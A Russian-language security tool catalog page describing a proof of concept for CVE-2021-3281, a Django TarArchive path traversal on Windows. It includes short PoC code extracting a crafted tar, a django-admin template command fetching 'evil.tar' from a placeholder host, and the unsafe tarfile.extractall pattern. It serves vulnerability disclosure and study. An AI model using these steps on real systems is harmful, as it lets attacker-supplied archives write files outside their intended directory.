Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-3281 — Proof-of-concept для CVE-2021-3281: уязвимость обхода пути в утилите TarArchive Django через подделанные tar-файлы, с демонстрацией модуля tarfile Python. | Kitploit
Инструменты/GitHubGitHub/lwzsoviet/cve-2021-3281
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСтатьи и ИсследованияОбучение и Образование
GitHublwzsoviet/cve-2021-3281

CVE-2021-3281

Proof-of-concept для CVE-2021-3281: уязвимость обхода пути в утилите TarArchive Django через подделанные tar-файлы, с демонстрацией модуля tarfile Python.

Репозиторий
265 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-3281

В файле django.utils.archive.py, строка 171, в классе TarArchive существует уязвимость Directory Traversal (обход каталога).

Вызов функции os.path.join(to_path, name) не проверяет параметр "name"; если кто-то использует эту утилиту на платформе Windows, возникает риск Directory Traversal. POC:

from django.utils import archive
archive.extract('test.tar','.')
The test.tar include file named "d:game.exe",and the poc will create a file named "game.exe" in D://game.exe rather than "."
It looks like the Django core didn't use this util,but I still think it's a risk,maybe someone will use this util in webapp to archive somethings.``and there is another scene:``"djangoadmin startapp --template" command will use archive.py,see in https://docs.djangoproject.com/en/3.1/ref/django-admin/#s-startapp. POC is:

django-admin.exe startapp vulapp --template="C:/my_templates/test.tar"
It'll create a file named "game.exe" in D://game.exe rather than "vulapp/", It also accept URLs like "django-admin.exe startapp vulapp --template=https://xxx.com/evil.tar"

POC

from django.utils import archive
archive.extract('test.tar','.')

Аналогичная проблема есть в Python/Lib/tarfile.py:

#Lib/tarfile.py:
import tarfile
tar=tarfile.open('test.tar','r')
tar.extractall('.')
tar.close()

и в документации приводится предупреждение, см. https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

Ссылка

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3281

https://www.djangoproject.com/weblog/2021/feb/01/security-releases/

Скачать инструмент